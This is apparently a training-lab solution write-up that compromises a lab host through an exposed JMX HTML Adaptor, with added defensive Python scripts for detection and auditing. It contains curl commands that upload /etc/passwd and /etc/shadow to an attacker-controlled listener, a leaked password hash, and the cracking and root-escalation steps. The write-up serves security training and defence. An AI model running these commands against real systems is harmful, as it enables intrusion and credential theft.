© 2020 Caendra Inc. | HERA for WAPTXv2 | HTML Adapter To Root


GETTING STARTED

You are placed in an unknown network. Using nmap, discover an administrative console and explore it in
order to find a critical misconfiguration.

• Abuse an insecure administrative interface to gain code execution
• Then, extend your access to achieve a root shell on the target host

• Being familiar with JMX HTML adaptor interfaces
• Finding insecure JMX configurations
• Extending blind code execution to full compromise

• Burp Suite
• Browser
• Nmap
• Netcat
• A password cracking tool

Target machine: 172.16.64.203

TASK #1
Find any exposed administrative interface and explore it.
Hint: Focus on non-default/custom functionality.

TASK #2
Focus on any non-default/custom functionality discovered during the previous task. Try achieving code
execution.
Hint: Explore all MBean components for command execution, but focus on the MBean’s only attribute.

TASK #3
There are multiple attack paths to become root.
Hint: Try to obtain sensitive files and crack them.



SOLUTIONS – TASK #1

Below, you can find solutions for each task. Remember, though, that you can follow your own strategy,
which may be different from the one explained in the following lab.

We start with a standard nmap scan of the target host.

nmap -p- -sV -v -Pn 172.16.64.203 --open -T4

[…]
Nmap scan report for 172.16.64.203
Host is up (0.14s latency).
Not shown: 65199 closed ports, 333 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.18 ((Ubuntu))
8000/tcp open  http-alt

We decide to investigate the non-standard HTTP port visible in the results, 8000. It turns out to
expose an unprotected HTML Adaptor, the default web-based JMX administrative interface, through which
the attributes and operations of every registered MBean can be reached.
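The manual check above (browse to the port, recognise the agent view, pick out the custom MBeans) is easy to turn into an inventory script, which is how a defender would find the same misconfiguration across their own hosts before anyone else does. The following is an added example written for this write-up; it is not part of the HERA lab material. It assumes that the HtmlAdaptorServer agent view contains the strings "Agent View" and "Filter by object name" and links each MBean through a "/ViewObjectRes//<url-encoded ObjectName>" path; the embedded sample page, including the diagnosticsbean object name, is constructed so the code runs offline.

```python
"""Audit helper added to this write-up (not part of the original HERA lab
material): classify what answers on a host/port as an open JMX HTML Adaptor,
a password-protected one, or something else, and list the MBean domains the
agent view exposes so non-default ones can be reviewed first.

Assumptions (not taken from the lab text): the HtmlAdaptorServer agent view
contains the strings "Agent View" and "Filter by object name", and links to
MBeans through "/ViewObjectRes//<url-encoded ObjectName>"."""
import re
import urllib.error
import urllib.parse
import urllib.request

ADAPTOR_MARKERS = ("Agent View", "Filter by object name")   # assumed page markers
# Domains the JDK / JDMK register by themselves; anything else is application code.
DEFAULT_DOMAINS = {"JMImplementation", "htmladapter", "java.lang",
                   "java.util.logging", "com.sun.management", "java.nio"}
OBJECT_LINK = re.compile(r'href="/ViewObjectRes//([^"]+)"', re.IGNORECASE)

# Constructed agent-view page for offline use; the diagnosticsbean entry mirrors
# the custom MBean described in the lab, but its exact ObjectName is invented.
SAMPLE_AGENT_VIEW = """<html><head><title>Agent View</title></head><body>
<form>Filter by object name: <input name="fstr" value="*:*"></form>
<a href="/ViewObjectRes//JMImplementation%3Atype%3DMBeanServerDelegate">JMImplementation:type=MBeanServerDelegate</a>
<a href="/ViewObjectRes//htmladapter%3Aname%3DHtmlAdaptorServer">htmladapter:name=HtmlAdaptorServer</a>
<a href="/ViewObjectRes//diagnosticsbean%3Aname%3DDiagAgent">diagnosticsbean:name=DiagAgent</a>
</body></html>"""


def classify_adaptor(status, headers, body):
    """'open' = unauthenticated agent view, 'protected' = HTTP auth demanded, else 'other'."""
    if status == 401 and any(k.lower() == "www-authenticate" for k in headers):
        return "protected"
    if status == 200 and all(marker in body for marker in ADAPTOR_MARKERS):
        return "open"
    return "other"


def mbean_domains(body):
    """Return the set of JMX domains linked from an agent view page."""
    domains = set()
    for encoded in OBJECT_LINK.findall(body):
        object_name = urllib.parse.unquote(encoded)      # e.g. diagnosticsbean:name=DiagAgent
        domains.add(object_name.split(":", 1)[0])
    return domains


def non_default_domains(body):
    """Custom MBean domains, which deserve review before the stock ones."""
    return sorted(mbean_domains(body) - DEFAULT_DOMAINS)


def probe(host, port=8000, timeout=5):
    """Fetch http://host:port/ and classify it; returns (verdict, custom_domains)."""
    url = f"http://{host}:{port}/"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
            return classify_adaptor(resp.status, dict(resp.headers), body), non_default_domains(body)
    except urllib.error.HTTPError as err:
        return classify_adaptor(err.code, dict(err.headers), ""), []
    except (urllib.error.URLError, OSError):
        return "unreachable", []


if __name__ == "__main__":
    # Offline demonstration on the constructed page; use probe(host) for a live check.
    print(classify_adaptor(200, {}, SAMPLE_AGENT_VIEW), non_default_domains(SAMPLE_AGENT_VIEW))
```

An "open" verdict on any host is a finding by itself; the list of non-default domains tells the reviewer where application code is exposed through JMX and therefore which MBeans need a closer look. The adaptor supports HTTP Basic authentication, so a "protected" verdict is the expected state for anything left listening on a reachable interface.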


We can see many default MBeans in the HTML adapter, and there might be various ways of achieving code
execution. First, though, we will focus on a non-default entry named DiagAgent, because customized
MBeans are more likely to be vulnerable or insecure than default ones. We will take a look at
diagnosticsbean; htmladapter is the service on port 8000 we are currently interacting with.

SOLUTIONS – TASK #2

The MBean exposes two operations that return no value and serve an unknown purpose, plus one
attribute (variable) that can be modified. We will try to inject OS commands into that attribute; it
looks like the “Message” attribute simply holds a command to be executed.

• First, the Message attribute is set by editing it and pressing “Apply”
• Then, start() is launched by clicking the “start” button

Before any exploitation activity, let’s first run a netcat listener.

nc -lvp 7000

“Message” is set to curl http://[your ip]:[listener port]/rce, in our case:

curl http://172.16.64.3:7000/rce

The below screenshot shows the process.


Upon clicking “start” we get the request from the vulnerable server which confirms code execution.
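From the host's point of view, what just happened is a JVM that serves a management interface spawning a shell or curl as root. That parent/child relationship is the signal a defender can alert on, independent of which MBean was abused. The following detection logic is an added example written for this write-up, not part of the HERA lab material. Its input is a constructed JSON-lines process feed in the style of an EDR or osquery process_events table; the four sample events, the JVM command line and the agent.jar path are all invented to mirror the lab and are not taken from the target host.

```python
"""Detection example added to this write-up (not part of the original HERA lab
material): flag processes that a JVM spawned which are shells or network
clients, and command lines that touch sensitive files. The input format is a
constructed JSON-lines process feed in the style of an EDR/osquery
process_events table; the events below are invented to mirror the lab."""
import json
import os

# Programs a JMX management agent has no business launching.
SUSPECT_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat",
                    "python", "python3", "perl"}
SENSITIVE_PATHS = ("/etc/shadow", "/etc/sudoers", "/root/.ssh", "id_rsa")

# Constructed sample feed (not real telemetry): a JVM, a shell it launched,
# curl launched by that shell, and an unrelated user process.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 1200, "parent": 1, "uid": 0,
     "path": "/usr/lib/jvm/java-8-openjdk-amd64/bin/java",
     "cmdline": "java -cp /opt/diag/agent.jar DiagAgentServer"},
    {"pid": 1310, "parent": 1200, "uid": 0, "path": "/bin/sh",
     "cmdline": "sh -c curl http://172.16.64.3:7000/rce"},
    {"pid": 1311, "parent": 1310, "uid": 0, "path": "/usr/bin/curl",
     "cmdline": "curl http://172.16.64.3:7000/rce -T /etc/shadow"},
    {"pid": 1400, "parent": 1, "uid": 1000, "path": "/usr/bin/vim",
     "cmdline": "vim notes.txt"},
])


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def jvm_ancestor(event, by_pid, max_depth=5):
    """Walk up the parent chain (bounded) and return the first java process, if any."""
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["parent"])
        if parent is None:
            return None
        if os.path.basename(parent["path"]) == "java":
            return parent
        current = parent
    return None


def analyse(events):
    """Return one finding per suspicious event: pid, process name, severity, reasons."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        name = os.path.basename(event["path"])
        reasons = []
        jvm = jvm_ancestor(event, by_pid)
        if jvm is not None and name in SUSPECT_CHILDREN:
            reasons.append(f"{name} spawned under JVM pid {jvm['pid']}")
        hits = [p for p in SENSITIVE_PATHS if p in event["cmdline"]]
        if hits:
            reasons.append("command line references " + ", ".join(hits))
        if reasons:
            findings.append({"pid": event["pid"], "process": name,
                             "severity": "high" if event["uid"] == 0 else "medium",
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

The ancestor walk matters because Runtime.exec-style code often goes through an intermediate shell, so the interesting child (curl) is a grandchild of the JVM rather than a direct child. Running the agent as an unprivileged service account would have capped the severity of every finding here at "medium" and, more importantly, would have kept /etc/shadow out of reach in the first place.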


SOLUTIONS – TASK #3

Now that we have code execution, let’s try to exfiltrate data using curl. We will change the
“Message” attribute again, this time to each of the commands below.

curl http://172.16.64.3:7000/rce -T /etc/passwd

curl http://172.16.64.3:7000/rce -T /etc/shadow

After each change of the Message value we restart the netcat listener and press “start” again.

This way we can first check whether the current user is root and, if so, obtain the password hashes.

Exfiltration of the shadow file succeeds, which means that:

• The code execution context is root
• We obtained one password hash from the file, which may be a candidate for offline cracking

The leaked password hash is:

xslt:$6$JUkOpKwn$ey9L68IqMovtItur1fLG0eWUh2f7NfCRJbmNpFCfk0oYw8Ldjt0ZkIeeyqZ54APpXd7tDTWtHxPeI0FqRlkDT.:18257:0:99999:7:::

Let’s use the rockyou wordlist below.

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-05.txt

Using john the ripper, the password is instantly cracked.
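The reason this step works is visible in the shadow line itself: one account has a real hash, no expiry, and a password weak enough to fall to rockyou in seconds. Reading those fields is a routine audit that a defender can run long before the file is ever exfiltrated. The parser below is an added example written for this write-up, not part of the HERA lab material; the sample file is constructed around the hash leaked above, with root and daemon shown as locked accounts the way a stock Ubuntu system has them.

```python
"""Audit example added to this write-up (not part of the original HERA lab
material): parse /etc/shadow entries and report which accounts carry a usable
password hash, which algorithm protects it, and when it was last changed.
The sample below is constructed around the hash leaked in the lab; root and
daemon are locked accounts as on a stock Ubuntu system."""
import re
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)                      # shadow(5) dates are days since this
ALGORITHMS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
              "y": "yescrypt", "2b": "bcrypt", "2y": "bcrypt"}
WEAK = {"descrypt", "md5crypt"}

SAMPLE_SHADOW = """root:*:18257:0:99999:7:::
daemon:*:17953:0:99999:7:::
xslt:$6$JUkOpKwn$ey9L68IqMovtItur1fLG0eWUh2f7NfCRJbmNpFCfk0oYw8Ldjt0ZkIeeyqZ54APpXd7tDTWtHxPeI0FqRlkDT.:18257:0:99999:7:::
"""


def parse_shadow(text):
    """Split shadow(5) lines into the fields this audit needs."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries.append({
            "name": fields[0],
            "hash": fields[1],
            "last_change": int(fields[2]) if fields[2] else None,
            "max_days": int(fields[4]) if fields[4] else None,
        })
    return entries


def hash_algorithm(hash_field):
    if hash_field == "":
        return "empty"                       # no password at all
    if hash_field[0] in "!*":
        return "locked"                      # password login disabled
    match = re.match(r"\$([^$]+)\$", hash_field)
    if match:
        return ALGORITHMS.get(match.group(1), "unknown:" + match.group(1))
    return "descrypt"                        # legacy 13-character DES crypt


def audit_shadow(entries):
    """One report row per account: algorithm, whether the hash is usable, issues."""
    report = []
    for entry in entries:
        algo = hash_algorithm(entry["hash"])
        usable = algo not in ("locked", "empty")
        issues = []
        if algo == "empty":
            issues.append("no password set")
        if algo in WEAK:
            issues.append("weak hash algorithm")
        if usable and (entry["max_days"] is None or entry["max_days"] >= 99999):
            issues.append("password never expires")
        last = entry["last_change"]
        report.append({
            "name": entry["name"],
            "algorithm": algo,
            "usable": usable,
            "last_changed": EPOCH + timedelta(days=last) if last is not None else None,
            "issues": issues,
        })
    return report


def password_accounts(report):
    """Accounts whose hash could be attacked offline if the file ever leaks."""
    return [row["name"] for row in report if row["usable"]]


if __name__ == "__main__":
    for row in audit_shadow(parse_shadow(SAMPLE_SHADOW)):
        print(row)
```

On the sample the only usable hash belongs to xslt, which is exactly the observation the next step of the solution relies on: when a single account on the box has a password, that account is worth protecting with a strong secret, key-only SSH, or a sudo policy that does not hand out a full root shell.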


Knowing that SSH is open, we can try to log in as that user. As the root account is disabled and this is
the only account on the filesystem with a password, we can suspect it has some extended privileges.

By inspecting sudo rights (see above) we confirm that knowing the password of that user is enough to
take complete control over the machine.
